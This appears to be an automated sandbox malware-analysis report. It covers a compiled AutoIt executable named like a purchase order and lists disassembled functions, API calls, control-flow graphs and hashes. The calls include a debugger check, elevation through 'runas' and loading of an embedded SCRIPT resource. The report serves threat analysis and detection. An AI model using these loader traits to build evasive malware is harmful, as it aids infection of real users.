                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 643 40b043-40b080 call 40f8a0 646 40b082-40b084 643->646 647 40b089-40b08b 643->647 648 40b860-40b86c call 40a70c 646->648 649 40b0ac-40b0d9 647->649 650 40b08d-40b0a7 call 407bda call 407c0e call 406e10 647->650 653 40b0e0-40b0e7 649->653 654 40b0db-40b0de 649->654 650->648 658 40b105 653->658 659 40b0e9-40b100 call 407bda call 407c0e call 406e10 653->659 654->653 657 40b10b-40b110 654->657 661 40b112-40b11c call 40f82f 657->661 662 40b11f-40b12d call 413bf2 657->662 658->657 688 40b851-40b854 659->688 661->662 674 40b133-40b145 662->674 675 40b44b-40b45d 662->675 674->675 677 40b14b-40b183 call 407a0d GetConsoleMode 674->677 678 40b463-40b473 675->678 679 40b7b8-40b7d5 WriteFile 675->679 677->675 700 40b189-40b18f 677->700 684 40b479-40b484 678->684 685 40b55a-40b55f 678->685 681 40b7e1-40b7e7 GetLastError 679->681 682 40b7d7-40b7df 679->682 689 40b7e9 681->689 682->689 686 40b48a-40b49a 684->686 687 40b81b-40b833 684->687 690 40b663-40b66e 685->690 691 40b565-40b56e 685->691 693 40b4a0-40b4a3 686->693 694 40b835-40b838 687->694 695 40b83e-40b84e call 407c0e call 407bda 687->695 699 40b85e-40b85f 688->699 697 40b7ef-40b7f1 689->697 690->687 696 40b674 690->696 691->687 698 40b574 691->698 703 40b4a5-40b4be 693->703 704 40b4e9-40b520 WriteFile 693->704 694->695 705 40b83a-40b83c 694->705 695->688 706 40b67e-40b693 696->706 708 40b7f3-40b7f5 697->708 709 40b856-40b85c 697->709 710 40b57e-40b595 698->710 699->648 701 40b191-40b193 700->701 702 40b199-40b1bc GetConsoleCP 700->702 701->675 701->702 711 40b440-40b446 702->711 712 40b1c2-40b1ca 702->712 713 40b4c0-40b4ca 703->713 714 40b4cb-40b4e7 703->714 704->681 715 40b526-40b538 704->715 705->699 716 40b699-40b69b 706->716 708->687 718 40b7f7-40b7fc 708->718 709->699 719 40b59b-40b59e 710->719 711->708 720 40b1d4-40b1d6 712->720 713->714 714->693 714->704 715->697 721 40b53e-40b54f 715->721 722 40b6d8-40b719 WideCharToMultiByte 716->722 723 40b69d-40b6b3 716->723 725 40b812-40b819 call 407bed 718->725 726 40b7fe-40b810 call 407c0e call 407bda 718->726 727 40b5a0-40b5b6 719->727 728 40b5de-40b627 WriteFile 719->728 731 40b36b-40b36e 720->731 732 40b1dc-40b1fe 720->732 721->686 733 40b555 721->733 722->681 737 40b71f-40b721 722->737 734 40b6b5-40b6c4 723->734 735 40b6c7-40b6d6 723->735 725->688 726->688 739 40b5b8-40b5ca 727->739 740 40b5cd-40b5dc 727->740 728->681 730 40b62d-40b645 728->730 730->697 742 40b64b-40b658 730->742 745 40b370-40b373 731->745 746 40b375-40b3a2 731->746 743 40b200-40b215 732->743 744 40b217-40b223 call 401688 732->744 733->697 734->735 735->716 735->722 747 40b727-40b75a WriteFile 737->747 739->740 740->719 740->728 742->710 749 40b65e 742->749 750 40b271-40b283 call 4140f7 743->750 766 40b225-40b239 744->766 767 40b269-40b26b 744->767 745->746 752 40b3a8-40b3ab 745->752 746->752 753 40b77a-40b78e GetLastError 747->753 754 40b75c-40b776 747->754 749->697 770 40b435-40b43b 750->770 771 40b289 750->771 761 40b3b2-40b3c5 call 415884 752->761 762 40b3ad-40b3b0 752->762 759 40b794-40b796 753->759 754->747 757 40b778 754->757 757->759 759->689 765 40b798-40b7b0 759->765 761->681 776 40b3cb-40b3d5 761->776 762->761 768 40b407-40b40a 762->768 765->706 772 40b7b6 765->772 774 40b412-40b42d 766->774 775 40b23f-40b254 call 4140f7 766->775 767->750 768->720 773 40b410 768->773 770->689 777 40b28f-40b2c4 WideCharToMultiByte 771->777 772->697 773->770 774->770 775->770 785 40b25a-40b267 775->785 779 40b3d7-40b3ee call 415884 776->779 780 40b3fb-40b401 776->780 777->770 781 40b2ca-40b2f0 WriteFile 777->781 779->681 788 40b3f4-40b3f5 779->788 780->768 781->681 784 40b2f6-40b30e 781->784 784->770 787 40b314-40b31b 784->787 785->777 787->780 789 40b321-40b34c WriteFile 787->789 788->780 789->681 790 40b352-40b359 789->790 790->770 791 40b35f-40b366 790->791 791->780
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0392782ca0d5fd56a02300eade9e0b7e1bd58da7da6279f9834b0aa1e8eb0bd3
                                                                                                              • Instruction ID: cefd7be4dd37120d733f1af1058078b302d14d19125ab82cf4dad81601c28e95
                                                                                                              • Opcode Fuzzy Hash: 0392782ca0d5fd56a02300eade9e0b7e1bd58da7da6279f9834b0aa1e8eb0bd3
                                                                                                              • Instruction Fuzzy Hash: 45327075B022188FCB249F15DC416EAB7B5FF46314F1440EAE40AE7A91D7349E80CF9A
                                                                                                              Function 003E3D19 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 151windowCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,003E3AA3,?), ref: 003E3D45
                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,003E3AA3,?), ref: 003E3D57
                                                                                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?,004A1148,004A1130,?,?,?,?,003E3AA3,?), ref: 003E3DC8
                                                                                                                • Part of subcall function 003E6430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,003E3DEE,004A1148,?,?,?,?,?,003E3AA3,?), ref: 003E6471
                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,003E3AA3,?), ref: 003E3E48
                                                                                                              • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,004928F4,00000010), ref: 00451CCE
                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,004A1148,?,?,?,?,?,003E3AA3,?), ref: 00451D06
                                                                                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0047DAB4,004A1148,?,?,?,?,?,003E3AA3,?), ref: 00451D89
                                                                                                              • ShellExecuteW.SHELL32(00000000,?,?,?,?,003E3AA3), ref: 00451D90
                                                                                                                • Part of subcall function 003E3E6E: GetSysColorBrush.USER32(0000000F), ref: 003E3E79
                                                                                                                • Part of subcall function 003E3E6E: LoadCursorW.USER32(00000000,00007F00), ref: 003E3E88
                                                                                                                • Part of subcall function 003E3E6E: LoadIconW.USER32(00000063), ref: 003E3E9E
                                                                                                                • Part of subcall function 003E3E6E: LoadIconW.USER32(000000A4), ref: 003E3EB0
                                                                                                                • Part of subcall function 003E3E6E: LoadIconW.USER32(000000A2), ref: 003E3EC2
                                                                                                                • Part of subcall function 003E3E6E: RegisterClassExW.USER32(?), ref: 003E3F30
                                                                                                                • Part of subcall function 003E36B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 003E36E6
                                                                                                                • Part of subcall function 003E36B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 003E3707
                                                                                                                • Part of subcall function 003E36B8: ShowWindow.USER32(00000000,?,?,?,?,003E3AA3,?), ref: 003E371B
                                                                                                                • Part of subcall function 003E36B8: ShowWindow.USER32(00000000,?,?,?,?,003E3AA3,?), ref: 003E3724
                                                                                                                • Part of subcall function 003E4FFC: _memset.LIBCMT ref: 003E5022
                                                                                                                • Part of subcall function 003E4FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 003E50CB
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                                              • String ID: ()I$This is a third-party compiled AutoIt script.$runas
                                                                                                              • API String ID: 438480954-3894604172
                                                                                                              • Opcode ID: 7550514949c9587d2be195316fecc8eba9668c63d1381a413a0af0d09dfb6bc7
                                                                                                              • Instruction ID: 577f520411a636e97d5bb4cc3ff214bbcbaf1e03b3d0cb1c9d22607089a7990a
                                                                                                              • Opcode Fuzzy Hash: 7550514949c9587d2be195316fecc8eba9668c63d1381a413a0af0d09dfb6bc7
                                                                                                              • Instruction Fuzzy Hash: AC514A31E042E8AACF03ABB2DC05EEE7F799F5A704F004235F5016B1E2DAB84549CB25
                                                                                                              Function 003FDDC0 Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1074 3fddc0-3fde4f call 3ed7f7 GetVersionExW call 3e6a63 call 3fdfb4 call 3e6571 1083 3fde55-3fde56 1074->1083 1084 4524c8-4524cb 1074->1084 1085 3fde58-3fde63 1083->1085 1086 3fde92-3fdea2 call 3fdf77 1083->1086 1087 4524e4-4524e8 1084->1087 1088 4524cd 1084->1088 1091 3fde69-3fde6b 1085->1091 1092 45244e-452454 1085->1092 1105 3fdec7-3fdee1 1086->1105 1106 3fdea4-3fdec1 GetCurrentProcess call 3fdf5f 1086->1106 1089 4524d3-4524dc 1087->1089 1090 4524ea-4524f3 1087->1090 1094 4524d0 1088->1094 1089->1087 1090->1094 1097 4524f5-4524f8 1090->1097 1098 452469-452475 1091->1098 1099 3fde71-3fde74 1091->1099 1095 452456-452459 1092->1095 1096 45245e-452464 1092->1096 1094->1089 1095->1086 1096->1086 1097->1089 1101 452477-45247a 1098->1101 1102 45247f-452485 1098->1102 1103 452495-452498 1099->1103 1104 3fde7a-3fde89 1099->1104 1101->1086 1102->1086 1103->1086 1109 45249e-4524b3 1103->1109 1110 3fde8f 1104->1110 1111 45248a-452490 1104->1111 1107 3fdee3-3fdef7 call 3fe00c 1105->1107 1108 3fdf31-3fdf3b GetSystemInfo 1105->1108 1106->1105 1125 3fdec3 1106->1125 1122 3fdf29-3fdf2f GetSystemInfo 1107->1122 1123 3fdef9-3fdf01 call 3fdff4 GetNativeSystemInfo 1107->1123 1113 3fdf0e-3fdf1a 1108->1113 1115 4524b5-4524b8 1109->1115 1116 4524bd-4524c3 1109->1116 1110->1086 1111->1086 1119 3fdf1c-3fdf1f FreeLibrary 1113->1119 1120 3fdf21-3fdf26 1113->1120 1115->1086 1116->1086 1119->1120 1124 3fdf03-3fdf07 1122->1124 1123->1124 1124->1113 1128 3fdf09-3fdf0c FreeLibrary 1124->1128 1125->1105 1128->1113
                                                                                                              APIs
                                                                                                              • GetVersionExW.KERNEL32(?), ref: 003FDDEC
                                                                                                              • GetCurrentProcess.KERNEL32(00000000,0047DC38,?,?), ref: 003FDEAC
                                                                                                              • GetNativeSystemInfo.KERNELBASE(?,0047DC38,?,?), ref: 003FDF01
                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?), ref: 003FDF0C
                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?), ref: 003FDF1F
                                                                                                              • GetSystemInfo.KERNEL32(?,0047DC38,?,?), ref: 003FDF29
                                                                                                              • GetSystemInfo.KERNEL32(?,0047DC38,?,?), ref: 003FDF35
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                                                              • String ID:
                                                                                                              • API String ID: 3851250370-0
                                                                                                              • Opcode ID: 3dd72e0a12ad8e4174eb1546e65adaede3da23c1a96c4eb91815881611bfb99f
                                                                                                              • Instruction ID: 84cd2df2f002477baa9063bbf7a1c21667a4ce6529c9090d0072322383340c23
                                                                                                              • Opcode Fuzzy Hash: 3dd72e0a12ad8e4174eb1546e65adaede3da23c1a96c4eb91815881611bfb99f
                                                                                                              • Instruction Fuzzy Hash: 1E61D37180A388DFCF16CF6898C45E97FB56F3A300B1985D9D8459F207C664C909CB6A
                                                                                                              Function 003E406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1146 3e406b-3e4083 CreateStreamOnHGlobal 1147 3e4085-3e409c FindResourceExW 1146->1147 1148 3e40a3-3e40a6 1146->1148 1149 454f16-454f25 LoadResource 1147->1149 1150 3e40a2 1147->1150 1149->1150 1151 454f2b-454f39 SizeofResource 1149->1151 1150->1148 1151->1150 1152 454f3f-454f4a LockResource 1151->1152 1152->1150 1153 454f50-454f6e 1152->1153 1153->1150
                                                                                                              APIs
                                                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,003E449E,?,?,00000000,00000001), ref: 003E407B
                                                                                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,003E449E,?,?,00000000,00000001), ref: 003E4092
                                                                                                              • LoadResource.KERNEL32(?,00000000,?,?,003E449E,?,?,00000000,00000001,?,?,?,?,?,?,003E41FB), ref: 00454F1A
                                                                                                              • SizeofResource.KERNEL32(?,00000000,?,?,003E449E,?,?,00000000,00000001,?,?,?,?,?,?,003E41FB), ref: 00454F2F
                                                                                                              • LockResource.KERNEL32(003E449E,?,?,003E449E,?,?,00000000,00000001,?,?,?,?,?,?,003E41FB,00000000), ref: 00454F42
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                              • String ID: SCRIPT
                                                                                                              • API String ID: 3051347437-3967369404
                                                                                                              • Opcode ID: 62bce858b2515d6cf90dada56f144fa907e9a08e8a6249d4372577222e0d154a
                                                                                                              • Instruction ID: 17ca9b9ddbeeed006eebe12b68304db5c969e881cb1070e8d4332339b8003086
                                                                                                              • Opcode Fuzzy Hash: 62bce858b2515d6cf90dada56f144fa907e9a08e8a6249d4372577222e0d154a
                                                                                                              • Instruction Fuzzy Hash: 84115E71600751BFE7219B66DC48F27BBB9EBC9B51F10457CF60286290DAB1DC049A21
                                                                                                              Function 00426CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetFileAttributesW.KERNELBASE(?,00452F49), ref: 00426CB9
                                                                                                              • FindFirstFileW.KERNELBASE(?,?), ref: 00426CCA
                                                                                                              • FindClose.KERNEL32(00000000), ref: 00426CDA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileFind$AttributesCloseFirst
                                                                                                              • String ID:
                                                                                                              • API String ID: 48322524-0
                                                                                                              • Opcode ID: e69c515ce120e4503e3d3f1c85684851a07167057437746837c68762f5429e87
                                                                                                              • Instruction ID: 51f58c43466355f73eb744fdb187186b43feac5b4e81002f6d40d70b86ae28fb
                                                                                                              • Opcode Fuzzy Hash: e69c515ce120e4503e3d3f1c85684851a07167057437746837c68762f5429e87
                                                                                                              • Instruction Fuzzy Hash: 06E09231E104205782146738AC094EA36ACDA0A339B500716F471C12D0EBF49900859E
                                                                                                              Function 003EE8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003EE959
                                                                                                              • timeGetTime.WINMM ref: 003EEBFA
                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003EED2E
                                                                                                              • TranslateMessage.USER32(?), ref: 003EED3F
                                                                                                              • DispatchMessageW.USER32(?), ref: 003EED4A
                                                                                                              • LockWindowUpdate.USER32(00000000), ref: 003EED79
                                                                                                              • DestroyWindow.USER32 ref: 003EED85
                                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003EED9F
                                                                                                              • Sleep.KERNEL32(0000000A), ref: 00455270
                                                                                                              • TranslateMessage.USER32(?), ref: 004559F7
                                                                                                              • DispatchMessageW.USER32(?), ref: 00455A05
                                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00455A19
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                                              • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                              • API String ID: 2641332412-570651680
                                                                                                              • Opcode ID: 7754ddeaa30be64e0dab04ce436724a42763f6a822a8b76f05af5e1af7ff072d
                                                                                                              • Instruction ID: 4a2dcaf2fe540cd95f00722cba2f25f88af7fcbedffc30376e68156cafa3960b
                                                                                                              • Opcode Fuzzy Hash: 7754ddeaa30be64e0dab04ce436724a42763f6a822a8b76f05af5e1af7ff072d
                                                                                                              • Instruction Fuzzy Hash: 7362D270508390DFDB22DF25C895BAA77E4BF44304F144A7EF9468B2E2DBB49848CB56
                                                                                                              Function 00415C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ___createFile.LIBCMT ref: 00415EC3
                                                                                                              • ___createFile.LIBCMT ref: 00415F04
                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00415F2D
                                                                                                              • __dosmaperr.LIBCMT ref: 00415F34
                                                                                                              • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00415F47
                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00415F6A
                                                                                                              • __dosmaperr.LIBCMT ref: 00415F73
                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00415F7C
                                                                                                              • __set_osfhnd.LIBCMT ref: 00415FAC
                                                                                                              • __lseeki64_nolock.LIBCMT ref: 00416016
                                                                                                              • __close_nolock.LIBCMT ref: 0041603C
                                                                                                              • __chsize_nolock.LIBCMT ref: 0041606C
                                                                                                              • __lseeki64_nolock.LIBCMT ref: 0041607E
                                                                                                              • __lseeki64_nolock.LIBCMT ref: 00416176
                                                                                                              • __lseeki64_nolock.LIBCMT ref: 0041618B
                                                                                                              • __close_nolock.LIBCMT ref: 004161EB
                                                                                                                • Part of subcall function 0040EA9C: CloseHandle.KERNELBASE(00000000,0048EEF4,00000000,?,00416041,0048EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0040EAEC
                                                                                                                • Part of subcall function 0040EA9C: GetLastError.KERNEL32(?,00416041,0048EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0040EAF6
                                                                                                                • Part of subcall function 0040EA9C: __free_osfhnd.LIBCMT ref: 0040EB03
                                                                                                                • Part of subcall function 0040EA9C: __dosmaperr.LIBCMT ref: 0040EB25
                                                                                                                • Part of subcall function 00407C0E: __getptd_noexit.LIBCMT ref: 00407C0E
                                                                                                              • __lseeki64_nolock.LIBCMT ref: 0041620D
                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00416342
                                                                                                              • ___createFile.LIBCMT ref: 00416361
                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0041636E
                                                                                                              • __dosmaperr.LIBCMT ref: 00416375
                                                                                                              • __free_osfhnd.LIBCMT ref: 00416395
                                                                                                              • __invoke_watson.LIBCMT ref: 004163C3
                                                                                                              • __wsopen_helper.LIBCMT ref: 004163DD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                                              • String ID: @
                                                                                                              • API String ID: 3896587723-2766056989
                                                                                                              • Opcode ID: e5c173e0cc136fd31e52e3bcd625179dfe831a1c74625de8d1dff435aeab6c5e
                                                                                                              • Instruction ID: 7f2a5a8ab6f4f6690cf8a04715001375f5d69ae379ead3738684a12ac0e51cb3
                                                                                                              • Opcode Fuzzy Hash: e5c173e0cc136fd31e52e3bcd625179dfe831a1c74625de8d1dff435aeab6c5e
                                                                                                              • Instruction Fuzzy Hash: 50222371D006099BEB259F68D845BEE7B21EB44314F29826BE921A73D1C33DCDC1C79A
                                                                                                              Function 0042FA0C Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 238COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • _wcscpy.LIBCMT ref: 0042FA96
                                                                                                              • _wcschr.LIBCMT ref: 0042FAA4
                                                                                                              • _wcscpy.LIBCMT ref: 0042FABB
                                                                                                              • _wcscat.LIBCMT ref: 0042FACA
                                                                                                              • _wcscat.LIBCMT ref: 0042FAE8
                                                                                                              • _wcscpy.LIBCMT ref: 0042FB09
                                                                                                              • __wsplitpath.LIBCMT ref: 0042FBE6
                                                                                                              • _wcscpy.LIBCMT ref: 0042FC0B
                                                                                                              • _wcscpy.LIBCMT ref: 0042FC1D
                                                                                                              • _wcscpy.LIBCMT ref: 0042FC32
                                                                                                              • _wcscat.LIBCMT ref: 0042FC47
                                                                                                              • _wcscat.LIBCMT ref: 0042FC59
                                                                                                              • _wcscat.LIBCMT ref: 0042FC6E
                                                                                                                • Part of subcall function 0042BFA4: _wcscmp.LIBCMT ref: 0042C03E
                                                                                                                • Part of subcall function 0042BFA4: __wsplitpath.LIBCMT ref: 0042C083
                                                                                                                • Part of subcall function 0042BFA4: _wcscpy.LIBCMT ref: 0042C096
                                                                                                                • Part of subcall function 0042BFA4: _wcscat.LIBCMT ref: 0042C0A9
                                                                                                                • Part of subcall function 0042BFA4: __wsplitpath.LIBCMT ref: 0042C0CE
                                                                                                                • Part of subcall function 0042BFA4: _wcscat.LIBCMT ref: 0042C0E4
                                                                                                                • Part of subcall function 0042BFA4: _wcscat.LIBCMT ref: 0042C0F7
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                                                              • String ID: >>>AUTOIT SCRIPT<<<$t2I
                                                                                                              • API String ID: 2955681530-2204676061
                                                                                                              • Opcode ID: 9cb56f4fc2552fd35637aa1b56082dea1765464a64e573ef4b0a3c41740ec05b
                                                                                                              • Instruction ID: 646c6345df49ba36c05d2480a06a287551d983ebe55b546da0d6da86b705e84a
                                                                                                              • Opcode Fuzzy Hash: 9cb56f4fc2552fd35637aa1b56082dea1765464a64e573ef4b0a3c41740ec05b
